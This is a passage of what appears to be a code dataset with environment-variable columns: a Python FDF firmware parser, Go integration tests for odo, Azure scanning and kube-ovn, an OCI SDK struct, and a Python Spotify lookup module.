if not self.__IsKeyword("COMP_LOC"):
raise Warning("expected COMP_LOC At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.CompLoc = ""
if self.__GetNextWord():
CompStatementObj.CompLoc = self.__Token
if self.__IsToken('|'):
if not self.__GetNextWord():
raise Warning("Expected Region Name At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token not in ("F", "N", "S"): # "H", "L", "PH" and "PL" are not supported
raise Warning("Unknown location type At line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.FilePos = self.__Token
else:
self.CurrentLineNumber += 1
self.CurrentOffsetWithinLine = 0
if not self.__IsKeyword("COMP_TYPE"):
raise Warning("expected COMP_TYPE At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Component type At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token not in ("FIT", "PAL_B", "PAL_A", "OEM"):
if not self.__Token.startswith("0x") or len(self.__Token) < 3 or len(self.__Token) > 4 or \
not self.__HexDigit(self.__Token[2]) or not self.__HexDigit(self.__Token[-1]):
raise Warning("Unknown component type At line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.CompType = self.__Token
if not self.__IsKeyword("COMP_VER"):
raise Warning("expected COMP_VER At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Component version At Line ", self.FileName, self.CurrentLineNumber)
Pattern = re.compile(r'-$|[0-9]{0,1}[0-9]{1}\.[0-9]{0,1}[0-9]{1}')
if Pattern.match(self.__Token) == None:
raise Warning("Unknown version format At line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.CompVer = self.__Token
if not self.__IsKeyword("COMP_CS"):
raise Warning("expected COMP_CS At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Component CS At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token not in ("1", "0"):
raise Warning("Unknown Component CS At line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.CompCs = self.__Token
if not self.__IsKeyword("COMP_BIN"):
raise Warning("expected COMP_BIN At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Component file At Line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.CompBin = self.__Token
if not self.__IsKeyword("COMP_SYM"):
raise Warning("expected COMP_SYM At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Component symbol file At Line ", self.FileName, self.CurrentLineNumber)
CompStatementObj.CompSym = self.__Token
if not self.__IsKeyword("COMP_SIZE"):
raise Warning("expected COMP_SIZE At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if self.__IsToken("-"):
CompStatementObj.CompSize = self.__Token
elif self.__GetNextDecimalNumber():
CompStatementObj.CompSize = self.__Token
elif self.__GetNextHexNumber():
CompStatementObj.CompSize = self.__Token
else:
raise Warning("Unknown size At line ", self.FileName, self.CurrentLineNumber)
VtfObj.ComponentStatementList.append(CompStatementObj)
return True
## __GetFvInFd() method
#
# Get FV list contained in FD
#
# @param self The object pointer
# @param FdName FD name
# @retval FvList list of FV in FD
#
def __GetFvInFd (self, FdName):
FvList = []
if FdName.upper() in self.Profile.FdDict.keys():
FdObj = self.Profile.FdDict[FdName.upper()]
for elementRegion in FdObj.RegionList:
if elementRegion.RegionType == 'FV':
for elementRegionData in elementRegion.RegionDataList:
if elementRegionData != None and elementRegionData.upper() not in FvList:
FvList.append(elementRegionData.upper())
return FvList
## __GetReferencedFdFvTuple() method
#
# Get FD and FV list referenced by a FFS file
#
# @param self The object pointer
# @param FfsFile contains sections to be searched
# @param RefFdList referenced FD by section
# @param RefFvList referenced FV by section
#
def __GetReferencedFdFvTuple(self, FvObj, RefFdList = [], RefFvList = []):
for FfsObj in FvObj.FfsList:
if isinstance(FfsObj, FfsFileStatement.FileStatement):
if FfsObj.FvName != None and FfsObj.FvName.upper() not in RefFvList:
RefFvList.append(FfsObj.FvName.upper())
elif FfsObj.FdName != None and FfsObj.FdName.upper() not in RefFdList:
RefFdList.append(FfsObj.FdName.upper())
else:
self.__GetReferencedFdFvTupleFromSection(FfsObj, RefFdList, RefFvList)
## __GetReferencedFdFvTupleFromSection() method
#
# Get FD and FV list referenced by a FFS section
#
# @param self The object pointer
# @param FfsFile contains sections to be searched
# @param FdList referenced FD by section
# @param FvList referenced FV by section
#
def __GetReferencedFdFvTupleFromSection(self, FfsFile, FdList = [], FvList = []):
SectionStack = []
SectionStack.extend(FfsFile.SectionList)
while SectionStack != []:
SectionObj = SectionStack.pop()
if isinstance(SectionObj, FvImageSection.FvImageSection):
if SectionObj.FvName != None and SectionObj.FvName.upper() not in FvList:
FvList.append(SectionObj.FvName.upper())
if SectionObj.Fv != None and SectionObj.Fv.UiFvName != None and SectionObj.Fv.UiFvName.upper() not in FvList:
FvList.append(SectionObj.Fv.UiFvName.upper())
self.__GetReferencedFdFvTuple(SectionObj.Fv, FdList, FvList)
if isinstance(SectionObj, CompressSection.CompressSection) or isinstance(SectionObj, GuidSection.GuidSection):
SectionStack.extend(SectionObj.SectionList)
## CycleReferenceCheck() method
#
# Check whether cycle reference exists in FDF
#
# @param self The object pointer
# @retval True cycle reference exists
# @retval False Not exists cycle reference
#
def CycleReferenceCheck(self):
CycleRefExists = False
try:
for FvName in self.Profile.FvDict.keys():
LogStr = "Cycle Reference Checking for FV: %s\n" % FvName
RefFvStack = []
RefFvStack.append(FvName)
FdAnalyzedList = []
while RefFvStack != []:
FvNameFromStack = RefFvStack.pop()
if FvNameFromStack.upper() in self.Profile.FvDict.keys():
FvObj = self.Profile.FvDict[FvNameFromStack.upper()]
else:
continue
RefFdList = []
RefFvList = []
self.__GetReferencedFdFvTuple(FvObj, RefFdList, RefFvList)
for RefFdName in RefFdList:
if RefFdName in FdAnalyzedList:
continue
LogStr += "FD %s is referenced by FV %s\n" % (RefFdName, FvNameFromStack)
FvInFdList = self.__GetFvInFd(RefFdName)
if FvInFdList != []:
LogStr += "FD %s contains FV: " % RefFdName
for FvObj in FvInFdList:
LogStr += FvObj
LogStr += ' \n'
if FvObj not in RefFvStack:
RefFvStack.append(FvObj)
if FvName in RefFvStack:
CycleRefExists = True
raise Warning(LogStr)
FdAnalyzedList.append(RefFdName)
for RefFvName in RefFvList:
LogStr += "FV %s is referenced by FV %s\n" % (RefFvName, FvNameFromStack)
if RefFvName not in RefFvStack:
RefFvStack.append(RefFvName)
if FvName in RefFvStack:
CycleRefExists = True
raise Warning(LogStr)
except Warning:
print LogStr
finally:
return CycleRefExists
if __name__ == "__main__":
import sys
try:
test_file = sys.argv[1]
except IndexError, v:
print "Usage: %s filename" % sys.argv[0]
sys.exit(1)
parser = FdfParser(test_file)
try:
parser.ParseFile()
parser.CycleReferenceCheck()
except Warning, X:
print X.message
else:
print "Success!"
|
[] |
[] |
[
"WORKSPACE"
] |
[]
|
["WORKSPACE"]
|
python
| 1 | 0 | |
tests/integration/devfile/cmd_devfile_describe_test.go
|
package devfile
import (
"os"
"path/filepath"
devfilepkg "github.com/devfile/api/v2/pkg/devfile"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"github.com/openshift/odo/pkg/component"
"github.com/openshift/odo/tests/helper"
"github.com/tidwall/gjson"
)
var _ = Describe("odo devfile describe command tests", func() {
var commonVar helper.CommonVar
// This is run before every Spec (It)
var _ = BeforeEach(func() {
if os.Getenv("KUBERNETES") != "true" {
Skip("Plain Kubernetes scenario only, skipping")
}
commonVar = helper.CommonBeforeEach()
})
// This is run after every Spec (It)
var _ = AfterEach(func() {
helper.CommonAfterEach(commonVar)
})
When("a component is created with storage and url", func() {
var (
compName = "cmp-git"
compType = "django"
)
BeforeEach(func() {
// Using the Django example here because it helps to distinguish between language and projectType.
// With nodejs, both projectType and language are nodejs, but with python-django, django is the projectType and python is the language.
helper.CopyExample(filepath.Join("source", "python"), commonVar.Context)
helper.Cmd("odo", "create", "python-django", compName, "--project", commonVar.Project, "--context", commonVar.Context, "--app", "testing").ShouldPass()
helper.Cmd("odo", "url", "create", "url-1", "--port", "3000", "--host", "example.com", "--context", commonVar.Context).ShouldPass()
helper.Cmd("odo", "url", "create", "url-2", "--port", "4000", "--host", "example.com", "--context", commonVar.Context).ShouldPass()
helper.Cmd("odo", "storage", "create", "storage-1", "--size", "1Gi", "--path", "/data1", "--context", commonVar.Context).ShouldPass()
})
AfterEach(func() {
// odo delete requires changing directory because it does not work as intended with --context
// TODO: Remove helper.Chdir after these issues are closed - https://github.com/openshift/odo/issues/4451
// TODO: and https://github.com/openshift/odo/issues/4135
helper.Chdir(commonVar.Context)
helper.Cmd("odo", "delete", "-f", "--all").ShouldPass()
})
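// checkDescribe verifies the `odo describe` output for the component in the given state:
// the human-readable output must mention the component name, type, both urls and the storage,
// and the json output must report the same resources together with the expected status.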
var checkDescribe = func(status string) {
cmpDescribe := helper.Cmd("odo", "describe", "--context", commonVar.Context).ShouldPass().Out()
helper.MatchAllInOutput(cmpDescribe, []string{
compName,
compType,
"url-1",
"url-2",
"storage-1",
})
By("checking describe works with json output", func() {
cmpDescribeJSON, err := helper.Unindented(helper.Cmd("odo", "describe", "-o", "json", "--context", commonVar.Context).ShouldPass().Out())
Expect(err).Should(BeNil())
valuesDes := gjson.GetMany(cmpDescribeJSON, "kind", "metadata.name", "status.state", "spec.urls.items.0.metadata.name", "spec.urls.items.0.spec.host", "spec.urls.items.1.metadata.name", "spec.urls.items.1.spec.host", "spec.storages.items.0.metadata.name", "spec.storages.items.0.spec.containerName")
expectedDes := []string{"Component", compName, status, "url-1", "url-1.example.com", "url-2", "url-2.example.com", "storage-1", "py-web"}
Expect(helper.GjsonMatcher(valuesDes, expectedDes)).To(Equal(true))
})
By("checking describe with component name works", func() {
// odo should describe a component that has not been pushed if the component name is given.
helper.Cmd("odo", "describe", compName, "--context", commonVar.Context).ShouldPass()
Expect(cmpDescribe).To(ContainSubstring(compName))
})
}
It("should describe the component correctly", func() {
checkDescribe("Not Pushed")
})
It("should describe the component correctly from a disconnected cluster", func() {
By("getting human readable output", func() {
output := helper.Cmd("odo", "describe", "--context", commonVar.Context).WithEnv("KUBECONFIG=/no/path", "GLOBALODOCONFIG="+os.Getenv("GLOBALODOCONFIG")).ShouldPass().Out()
helper.MatchAllInOutput(output, []string{compName, compType})
})
By("getting json output", func() {
output := helper.Cmd("odo", "describe", "--context", commonVar.Context, "-o", "json").WithEnv("KUBECONFIG=/no/path", "GLOBALODOCONFIG="+os.Getenv("GLOBALODOCONFIG")).ShouldPass().Out()
values := gjson.GetMany(output, "kind", "metadata.name", "spec.type", "status.state")
Expect(helper.GjsonMatcher(values, []string{"Component", compName, compType, "Unknown"})).To(Equal(true))
})
})
When("the component is pushed", func() {
BeforeEach(func() {
helper.Cmd("odo", "push", "--context", commonVar.Context).ShouldPass()
})
It("should describe the component correctly", func() {
checkDescribe("Pushed")
})
})
})
When("devfile has missing metadata", func() {
// Note: We will be using SpringBoot example here because it helps to distinguish between language and projectType.
// In terms of SpringBoot, spring is the projectType and java is the language; see https://github.com/openshift/odo/issues/4815
var metadata devfilepkg.DevfileMetadata
// checkDescribe checks the describe output (both normal and json) to see if it contains the expected componentType
var checkDescribe = func(componentType string) {
By("checking the human readable output", func() {
stdOut := helper.Cmd("odo", "describe", "--context", commonVar.Context).ShouldPass().Out()
Expect(stdOut).To(ContainSubstring(componentType))
})
By("checking the json output", func() {
stdOut := helper.Cmd("odo", "describe", "--context", commonVar.Context, "-o", "json").ShouldPass().Out()
Expect(gjson.Get(stdOut, "spec.type").String()).To(Equal(componentType))
})
}
When("projectType is missing", func() {
BeforeEach(func() {
helper.CopyAndCreate(filepath.Join("source", "devfiles", "springboot", "project"), filepath.Join("source", "devfiles", "springboot", "devfile-with-missing-projectType-metadata.yaml"), commonVar.Context)
metadata = helper.GetMetadataFromDevfile(filepath.Join(commonVar.Context, "devfile.yaml"))
})
It("should show the language for 'Type' in odo describe", func() {
checkDescribe(metadata.Language)
})
When("the component is pushed", func() {
BeforeEach(func() {
helper.Cmd("odo", "push", "--context", commonVar.Context).ShouldPass().Out()
})
It("should show the language for 'Type' in odo describe", func() {
checkDescribe(metadata.Language)
})
})
})
When("projectType and language is missing", func() {
BeforeEach(func() {
helper.CopyAndCreate(filepath.Join("source", "devfiles", "springboot", "project"), filepath.Join("source", "devfiles", "springboot", "devfile-with-missing-projectType-and-language-metadata.yaml"), commonVar.Context)
metadata = helper.GetMetadataFromDevfile(filepath.Join(commonVar.Context, "devfile.yaml"))
})
It("should show 'Not available' for 'Type' in odo describe", func() {
checkDescribe(component.NotAvailable)
})
When("the component is pushed", func() {
BeforeEach(func() {
helper.Cmd("odo", "push", "--context", commonVar.Context).ShouldPass().Out()
})
It("should show 'Not available' for 'Type' in odo describe", func() {
checkDescribe(component.NotAvailable)
})
})
})
})
})
|
[
"\"KUBERNETES\"",
"\"GLOBALODOCONFIG\"",
"\"GLOBALODOCONFIG\""
] |
[] |
[
"KUBERNETES",
"GLOBALODOCONFIG"
] |
[]
|
["KUBERNETES", "GLOBALODOCONFIG"]
|
go
| 2 | 0 | |
waas/work_request_log_entry.go
|
// Copyright (c) 2016, 2018, 2021, Oracle and/or its affiliates. All rights reserved.
// This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
// Code generated. DO NOT EDIT.
// Web Application Acceleration and Security Services API
//
// OCI Web Application Acceleration and Security Services
//
package waas
import (
"github.com/erikcai/oci-go-sdk/v33/common"
)
// WorkRequestLogEntry A log message for a work request.
type WorkRequestLogEntry struct {
// The log message.
Message *string `mandatory:"false" json:"message"`
// The date and time the work request log event happened, expressed in RFC 3339 timestamp format.
Timestamp *common.SDKTime `mandatory:"false" json:"timestamp"`
}
func (m WorkRequestLogEntry) String() string {
return common.PointerString(m)
}
|
[] |
[] |
[] |
[]
|
[]
|
go
| null | null | null |
apis/spotify.py
|
import requests
from bs4 import BeautifulSoup, SoupStrainer
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
from typing import Dict, Optional
from apis.wikipedia import get_short_details, search_google, WikiUrlTitle
from constants import wikipedia_url
import os
from urllib.parse import urlparse
spotify_client_id = os.getenv('SPOTIFY_CLIENT_ID')
spotify_client_skey = os.getenv('SPOTIFY_CLIENT_SKEY')
spotify = spotipy.Spotify(
client_credentials_manager=SpotifyClientCredentials(
spotify_client_id, spotify_client_skey
)
)
def parse_wiki_url(title: str, content: str, creator: Optional[str] = None) -> str:
if content == WikiUrlTitle.artist:
title = title + ' musician wikipedia'
elif content == WikiUrlTitle.show:
title = title + ' podcast wikipedia'
elif content == WikiUrlTitle.track:
title = title + ' ' + creator + ' song wikipedia'
url = search_google(title)
return url
def parse_data_from_wiki(url: str) -> Dict:
return get_short_details(url)
def spotify_get(url: str) -> Dict:
api_data = {}
parse_url = urlparse(url)
spotify_id = parse_url.path.split('/')[2]
spotify_type = parse_url.path.split('/')[1]
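# e.g. for https://open.spotify.com/track/abc123 the parsed path is "/track/abc123",
# so split('/') gives ['', 'track', 'abc123'] -> spotify_type='track', spotify_id='abc123'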
uri = "spotify:%s:%s" % (spotify_type, spotify_id)
if spotify_type == "artist": #wiki data added
artist = spotify.artist(spotify_id)
artist_album = spotify.artist_albums(uri, album_type='album', limit=5)
artist_top_tracks = spotify.artist_top_tracks(uri)
api_data["artist_details"] = artist
api_data["artist_albums"] = artist_album
api_data["top_tracks"] = artist_top_tracks['tracks']
wiki_url = parse_wiki_url(api_data['artist_details']['name'], WikiUrlTitle.artist)
api_data['wiki_data'] = parse_data_from_wiki(wiki_url)
elif spotify_type == "playlist":
playlist = spotify.playlist(uri)
playlist_items = spotify.playlist_tracks(uri, limit=5)
api_data["playlist_details"] = playlist
api_data["playlist_tracks"] = playlist_items
elif spotify_type == "show": #wiki data added
show = spotify.show(uri, market="US")
show_episodes = spotify.show_episodes(uri, market="US")
api_data["show_details"] = show
api_data["episodes"] = show_episodes
wiki_url = parse_wiki_url(api_data["show_details"]['name'] , WikiUrlTitle.show)
api_data['wiki_data'] = parse_data_from_wiki(wiki_url)
elif spotify_type == "track": #wiki data added
track = spotify.track(uri)
api_data["track_details"] = track
wiki_url = parse_wiki_url(api_data['track_details']['name'], WikiUrlTitle.track, api_data['track_details']['artists'][0]['name'])
api_data['wiki_data'] = parse_data_from_wiki(wiki_url)
elif spotify_type == "episode":
episode = spotify.episode(uri, market="US")
api_data["episode_details"] = episode
elif spotify_type == "album":
album = spotify.album(uri)
api_data['album_details'] = album
return api_data
|
[] |
[] |
[
"SPOTIFY_CLIENT_SKEY",
"SPOTIFY_CLIENT_ID"
] |
[]
|
["SPOTIFY_CLIENT_SKEY", "SPOTIFY_CLIENT_ID"]
|
python
| 2 | 0 | |
vent/core/rq_dashboard/test_rq_dashboard.py
|
import os
def test_rq_dash_settings():
""" Tests the rq dashboard environment variable settings """
os.environ['DASH_PREFIX'] = "test"
os.environ['REMOTE_REDIS_HOST'] = "test"
os.environ['REMOTE_REDIS_PORT'] = "test"
os.environ['REMOTE_REDIS_PSWD'] = "test"
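# The variables above must be set before the import below; rq_dash_settings presumably
# reads them at import time, which is what this test exercises.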
import rq_dash_settings
|
[] |
[] |
[
"DASH_PREFIX",
"REMOTE_REDIS_HOST",
"REMOTE_REDIS_PSWD",
"REMOTE_REDIS_PORT"
] |
[]
|
["DASH_PREFIX", "REMOTE_REDIS_HOST", "REMOTE_REDIS_PSWD", "REMOTE_REDIS_PORT"]
|
python
| 4 | 0 | |
components/nodemanager-service/tests/scanjob_azure_api_integration_test.go
|
package manager
import (
"context"
"os"
"testing"
"time"
"github.com/chef/automate/api/interservice/compliance/common"
"github.com/chef/automate/api/interservice/compliance/jobs"
"github.com/chef/automate/api/interservice/compliance/reporting"
"github.com/chef/automate/api/interservice/nodemanager/manager"
"github.com/chef/automate/api/interservice/nodemanager/nodes"
"github.com/chef/automate/components/nodemanager-service/tests/mgrtesthelpers"
"github.com/golang/protobuf/ptypes"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/status"
)
func TestAzureAPIScanJob(t *testing.T) {
if !mgrtesthelpers.CheckForCreds("azure") {
t.Log("azure credentials missing; aborting")
t.FailNow()
}
t.Log("Running Azure-API scan job test.")
ctx := context.Background()
cmpConn, err := mgrtesthelpers.GetComplianceConn()
require.NoError(t, err)
defer cmpConn.Close()
mgrConn, err := mgrtesthelpers.GetManagerConn()
require.NoError(t, err)
defer mgrConn.Close()
t.Log("connection to grpc successful")
// setup clients
mgrClient := manager.NewNodeManagerServiceClient(mgrConn)
jobsClient := jobs.NewJobsServiceClient(cmpConn)
reportingClient := reporting.NewReportingServiceClient(cmpConn)
nodesClient := nodes.NewNodesServiceClient(mgrConn)
// timestamp of now
now := time.Now()
originalReportingNodes, err := reportingClient.ListNodes(ctx, &reporting.Query{})
require.NoError(t, err)
t.Logf("Starting test at %s with %d nodes found in reporting", now, originalReportingNodes.GetTotal())
// delete all existing azure-api managers, just in case
mgrsList, err := mgrClient.List(ctx, &manager.Query{})
require.NoError(t, err)
for _, mgr := range mgrsList.GetManagers() {
if mgr.Type == "azure-api" {
_, err = mgrClient.Delete(ctx, &manager.Id{Id: mgr.Id})
assert.Contains(t, []codes.Code{codes.NotFound, codes.OK}, status.Convert(err).Code())
}
}
// create nodemanager
t.Log("Creating azure-api node manager using env creds.")
noCredsAzureMgr := manager.NodeManager{
Name: "my test azure api mgr",
Type: "azure-api",
CredentialData: []*common.Kv{
{Key: "AZURE_CLIENT_ID", Value: os.Getenv("AZURE_CLIENT_ID")},
{Key: "AZURE_CLIENT_SECRET", Value: os.Getenv("AZURE_CLIENT_SECRET")},
{Key: "AZURE_TENANT_ID", Value: os.Getenv("AZURE_TENANT_ID")}},
}
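// The manager above is built from AZURE_* environment variables, so the test environment must
// export them; the CheckForCreds guard at the top of this test presumably verifies that.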
mgrID, err := mgrClient.Create(ctx, &noCredsAzureMgr)
require.NoError(t, err)
require.NotZero(t, len(mgrID.Ids))
// create a job with node manager reference
mgrFilter := jobs.ManagerFilter{
ManagerId: mgrID.GetIds()[0].Id,
Filters: []*common.Filter{},
}
job := jobs.Job{
Name: "my job for azure-api node manager",
Tags: []*common.Kv{},
Type: "exec",
Profiles: []string{"https://github.com/vjeffrey/try-azure-profile/archive/master.tar.gz"},
NodeSelectors: []*jobs.ManagerFilter{&mgrFilter},
}
t.Log("Creating job for node manager, to execute azure api scan")
jobID, err := jobsClient.Create(ctx, &job)
require.NoError(t, err)
// read the job to get the status, loop until completed. fail test if failed.
jobRead, err := jobsClient.Read(ctx, jobID)
require.NoError(t, err)
status := jobRead.GetStatus()
t.Log("Reading job status, looping until status reports as completed.")
counter := 0
for status != "completed" {
t.Logf("status: %s (sleeping 1s)", status)
time.Sleep(1 * time.Second)
jobRead, err := jobsClient.Read(ctx, jobID)
require.NoError(t, err)
status = jobRead.Status
if status == "failed" {
t.Fatalf("job failed. job: %+v", jobRead)
}
counter++
if counter > 120 {
t.Fatalf("timed out waiting for job to finish")
}
}
// check reporting nodes. if job completed we should have a node in reporting nodes
reportingNodes, err := reportingClient.ListNodes(ctx, &reporting.Query{})
require.NoError(t, err)
// sometimes it takes a bit of extra time for the report to land in elastic, so here
// we loop until it has
counter = 0
for reportingNodes.GetTotal() == originalReportingNodes.GetTotal() {
t.Log("sleeping 1s; then retrieving reporting nodes total again")
time.Sleep(1 * time.Second)
reportingNodes, err = reportingClient.ListNodes(ctx, &reporting.Query{})
require.NoError(t, err)
counter++
if counter > 120 {
t.Fatalf("timed out waiting for job to finish")
}
}
require.Equal(t, reportingNodes.GetTotal() > originalReportingNodes.GetTotal(), true)
for _, listNode := range reportingNodes.GetNodes() {
endtime, err := ptypes.Timestamp(listNode.GetLatestReport().GetEndTime())
require.NoError(t, err)
if endtime.After(now) && listNode.GetEnvironment() == "azure-api" {
t.Logf("Beginning test time: %s", now)
t.Logf("Found node %s, end time: %s", listNode, endtime)
// check `/nodes` endpoint to ensure node marked as reachable
foundNode, err := nodesClient.Read(ctx, &nodes.Id{Id: listNode.Id})
require.NoError(t, err)
require.Equal(t, "reachable", foundNode.GetStatus())
}
}
}
|
[
"\"AZURE_CLIENT_ID\"",
"\"AZURE_CLIENT_SECRET\"",
"\"AZURE_TENANT_ID\""
] |
[] |
[
"AZURE_CLIENT_ID",
"AZURE_CLIENT_SECRET",
"AZURE_TENANT_ID"
] |
[]
|
["AZURE_CLIENT_ID", "AZURE_CLIENT_SECRET", "AZURE_TENANT_ID"]
|
go
| 3 | 0 | |
test/e2e/e2e_suite_test.go
|
package e2e
import (
"context"
_ "embed"
"encoding/json"
"fmt"
"os"
"os/exec"
"strconv"
"strings"
"testing"
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
k8sruntime "k8s.io/apimachinery/pkg/runtime"
kubeadmscheme "k8s.io/kubernetes/cmd/kubeadm/app/apis/kubeadm/scheme"
kubeadmapi "k8s.io/kubernetes/cmd/kubeadm/app/apis/kubeadm/v1beta3"
kubeadmconstants "k8s.io/kubernetes/cmd/kubeadm/app/constants"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
kubeovn "github.com/kubeovn/kube-ovn/pkg/apis/kubeovn/v1"
"github.com/kubeovn/kube-ovn/pkg/util"
"github.com/kubeovn/kube-ovn/test/e2e/framework"
// tests to run
_ "github.com/kubeovn/kube-ovn/test/e2e/ip"
_ "github.com/kubeovn/kube-ovn/test/e2e/kubectl-ko"
_ "github.com/kubeovn/kube-ovn/test/e2e/node"
_ "github.com/kubeovn/kube-ovn/test/e2e/qos"
_ "github.com/kubeovn/kube-ovn/test/e2e/service"
_ "github.com/kubeovn/kube-ovn/test/e2e/subnet"
"github.com/kubeovn/kube-ovn/test/e2e/underlay"
)
//go:embed network.json
var networkJSON []byte
var nodeNetworks map[string]nodeNetwork
type nodeNetwork struct {
Gateway string
IPAddress string
IPPrefixLen int
IPv6Gateway string
GlobalIPv6Address string
GlobalIPv6PrefixLen int
MacAddress string
}
func init() {
if err := json.Unmarshal(networkJSON, &nodeNetworks); err != nil {
panic(err)
}
}
func TestE2e(t *testing.T) {
RegisterFailHandler(Fail)
RunSpecs(t, "Kube-OVN E2E Suite")
}
var _ = SynchronizedAfterSuite(func() {}, func() {
f := framework.NewFramework("init", fmt.Sprintf("%s/.kube/config", os.Getenv("HOME")))
nss, err := f.KubeClientSet.CoreV1().Namespaces().List(context.Background(), metav1.ListOptions{LabelSelector: "e2e=true"})
if err != nil {
Fail(err.Error())
}
if nss != nil {
for _, ns := range nss.Items {
err := f.KubeClientSet.CoreV1().Namespaces().Delete(context.Background(), ns.Name, metav1.DeleteOptions{})
if err != nil {
Fail(err.Error())
}
}
}
err = f.OvnClientSet.KubeovnV1().Subnets().DeleteCollection(context.Background(), metav1.DeleteOptions{}, metav1.ListOptions{LabelSelector: "e2e=true"})
if err != nil {
Fail(err.Error())
}
err = f.OvnClientSet.KubeovnV1().Vlans().DeleteCollection(context.Background(), metav1.DeleteOptions{}, metav1.ListOptions{LabelSelector: "e2e=true"})
if err != nil {
Fail(err.Error())
}
err = f.OvnClientSet.KubeovnV1().ProviderNetworks().DeleteCollection(context.Background(), metav1.DeleteOptions{}, metav1.ListOptions{LabelSelector: "e2e=true"})
if err != nil {
Fail(err.Error())
}
})
func setExternalRoute(af int, dst, gw string) {
if dst == "" || gw == "" {
return
}
cmd := exec.Command("docker", "exec", "kube-ovn-e2e", "ip", fmt.Sprintf("-%d", af), "route", "replace", dst, "via", gw)
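// e.g. for af=4 this runs: docker exec kube-ovn-e2e ip -4 route replace <dst> via <gw>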
output, err := cmd.CombinedOutput()
if err != nil {
Fail((fmt.Sprintf(`failed to execute command "%s": %v, output: %s`, cmd.String(), err, strings.TrimSpace(string(output)))))
}
}
var _ = SynchronizedBeforeSuite(func() []byte {
subnetName := "static-ip"
namespace := "static-ip"
f := framework.NewFramework("init", fmt.Sprintf("%s/.kube/config", os.Getenv("HOME")))
_, err := f.KubeClientSet.CoreV1().Namespaces().Create(context.Background(), &corev1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: namespace,
Labels: map[string]string{"e2e": "true"}}}, metav1.CreateOptions{})
if err != nil {
Fail(err.Error())
}
s := kubeovn.Subnet{
ObjectMeta: metav1.ObjectMeta{
Name: subnetName,
Labels: map[string]string{"e2e": "true"},
},
Spec: kubeovn.SubnetSpec{
CIDRBlock: "12.10.0.0/16",
Namespaces: []string{namespace},
Protocol: util.CheckProtocol("12.10.0.0/16"),
},
}
_, err = f.OvnClientSet.KubeovnV1().Subnets().Create(context.Background(), &s, metav1.CreateOptions{})
if err != nil {
Fail(err.Error())
}
err = f.WaitSubnetReady(subnetName)
if err != nil {
Fail(err.Error())
}
nodes, err := f.KubeClientSet.CoreV1().Nodes().List(context.Background(), metav1.ListOptions{})
if err != nil {
Fail(err.Error())
}
kubeadmConfigMap, err := f.KubeClientSet.CoreV1().ConfigMaps(metav1.NamespaceSystem).Get(context.Background(), kubeadmconstants.KubeadmConfigConfigMap, metav1.GetOptions{})
if err != nil {
Fail(err.Error())
}
clusterConfig := &kubeadmapi.ClusterConfiguration{}
if err = k8sruntime.DecodeInto(kubeadmscheme.Codecs.UniversalDecoder(), []byte(kubeadmConfigMap.Data[kubeadmconstants.ClusterConfigurationConfigMapKey]), clusterConfig); err != nil {
Fail(fmt.Sprintf("failed to decode kubeadm cluster configuration from bytes: %v", err))
}
nodeIPv4, nodeIPv6 := util.GetNodeInternalIP(nodes.Items[0])
podSubnetV4, podSubnetV6 := util.SplitStringIP(clusterConfig.Networking.PodSubnet)
svcSubnetV4, svcSubnetV6 := util.SplitStringIP(clusterConfig.Networking.ServiceSubnet)
setExternalRoute(4, podSubnetV4, nodeIPv4)
setExternalRoute(4, svcSubnetV4, nodeIPv4)
setExternalRoute(6, podSubnetV6, nodeIPv6)
setExternalRoute(6, svcSubnetV6, nodeIPv6)
// underlay
var vlanID int
providerInterface := underlay.UnderlayInterface
if underlay.VlanID != "" {
if vlanID, err = strconv.Atoi(underlay.VlanID); err != nil || vlanID <= 0 || vlanID > 4095 {
Fail(underlay.VlanID + " is not a valid VLAN id")
}
providerInterface = underlay.VlanInterface
}
var underlayNodeIPs []string
var underlayCIDR, underlayGateway string
for node, network := range nodeNetworks {
underlay.SetNodeMac(node, network.MacAddress)
if network.IPAddress != "" {
underlay.AddNodeIP(network.IPAddress)
underlayNodeIPs = append(underlayNodeIPs, network.IPAddress)
underlay.AddNodeAddrs(node, fmt.Sprintf("%s/%d", network.IPAddress, network.IPPrefixLen))
if underlayCIDR == "" {
underlayCIDR = fmt.Sprintf("%s/%d", network.IPAddress, network.IPPrefixLen)
}
}
if network.GlobalIPv6Address != "" {
underlay.AddNodeAddrs(node, fmt.Sprintf("%s/%d", network.GlobalIPv6Address, network.GlobalIPv6PrefixLen))
}
if network.Gateway != "" {
